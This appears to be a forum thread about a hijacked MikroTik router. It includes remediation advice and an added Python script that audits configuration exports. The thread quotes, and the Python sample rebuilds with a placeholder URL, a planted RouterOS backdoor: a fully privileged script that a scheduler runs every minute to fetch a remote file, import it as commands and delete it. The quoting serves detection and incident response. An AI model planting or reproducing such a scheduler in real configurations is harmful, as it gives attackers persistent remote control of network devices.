
review your firewall (enable logging for all possible open ports until you identify the open door)

change password of admin user (better: make new user with admin rights and REMOVE default admin user)

review your logs for admin and VPN access

review any other script/auto-setting/whatever still available in Files

Block all external access to that device (pull the WAN cable out, sorry for that but it's needed)

It does look like someone has had (still has ?) access to your device.

We have tried to download this file "command.scr"; when we run it, it's only an HTML file.

We also do a weekly backup to FTP.

While checking one of our router backups, we found this script:

    add dont-require-permissions=no name=fetch owner=god policy=\
        ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\
        tool fetch url= :delay 10 /import file-n\
        ame=command.scr :delay 30 /file remove command.scr"
    add interval=1m name=fetch1m on-event=fetch policy=\
        ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \

We are blocking the access using /ip/services, with non standard port and certain IP only to access the router.

If we are outside of the office, we need to do L2TP before we can log in to the router.

We have disabled the access to the router, only from certain IP (office).

export hide-sensitive file=anynameyouwish

Which kind of VPN are you using for this access? Are you allowing access to the router from external sites?
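As an added example (not code from the thread or from MikroTik): a Python check that reads the text of a configuration export, rejoins the `\` line continuations, and flags scripts that fetch and then import a file, together with the schedulers that trigger them. The sample export is constructed from the fragments quoted in the thread with a placeholder URL; the `known_owners` list and the benign `backup`/`weekly` entries are assumptions.

```python
import re

# Constructed sample based on the thread's fragments; URL and backup/weekly entries are placeholders.
SAMPLE_EXPORT = r'''/system script
add dont-require-permissions=no name=fetch owner=god policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\
    tool fetch url=http://placeholder.invalid/command.scr :delay 10 /import file-n\
    ame=command.scr :delay 30 /file remove command.scr"
add name=backup owner=admin2 policy=ftp,read source="/system backup save name=weekly"
/system scheduler
add interval=1m name=fetch1m on-event=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon
add interval=1w name=weekly on-event=backup policy=ftp,read
'''

PAIR = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S*)')   # key=value or key="quoted value"
FETCH = re.compile(r'/tool\s+fetch\b', re.I)
IMPORT = re.compile(r'/import\b', re.I)

def parse_export(text):
    """Return {menu: [{key: value}, ...]} for the 'add' lines of an export."""
    joined = re.sub(r'\\\r?\n[ \t]*', '', text)  # undo "\" line continuations
    menu, items = None, {}
    for line in map(str.strip, joined.splitlines()):
        if line.startswith('/'):
            menu = line                           # e.g. "/system script"
        elif line.startswith('add ') and menu:
            item = {k: v.strip('"') for k, v in PAIR.findall(line)}
            items.setdefault(menu, []).append(item)
    return items

def audit(text, known_owners=('admin2',)):
    """Flag download-and-import scripts and the schedulers that run them."""
    cfg, findings, flagged = parse_export(text), [], set()
    for s in cfg.get('/system script', []):
        src, reasons = s.get('source', ''), []
        if FETCH.search(src) and IMPORT.search(src):
            reasons.append('fetches a file and imports it')
            flagged.add(s.get('name'))
        if s.get('owner') not in known_owners:    # assumption: you know your admin accounts
            reasons.append('owner %s is not a known admin' % s.get('owner'))
        if reasons:
            findings.append(('script', s.get('name'), reasons))
    for j in cfg.get('/system scheduler', []):
        event = j.get('on-event', '')             # script name or inline code
        if event in flagged or (FETCH.search(event) and IMPORT.search(event)):
            why = 'triggers fetch and import every %s' % j.get('interval', '?')
            findings.append(('scheduler', j.get('name'), [why]))
    return findings
```

Pass `audit()` the contents of the file written by `export hide-sensitive file=...` and review every finding it returns before removing anything.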
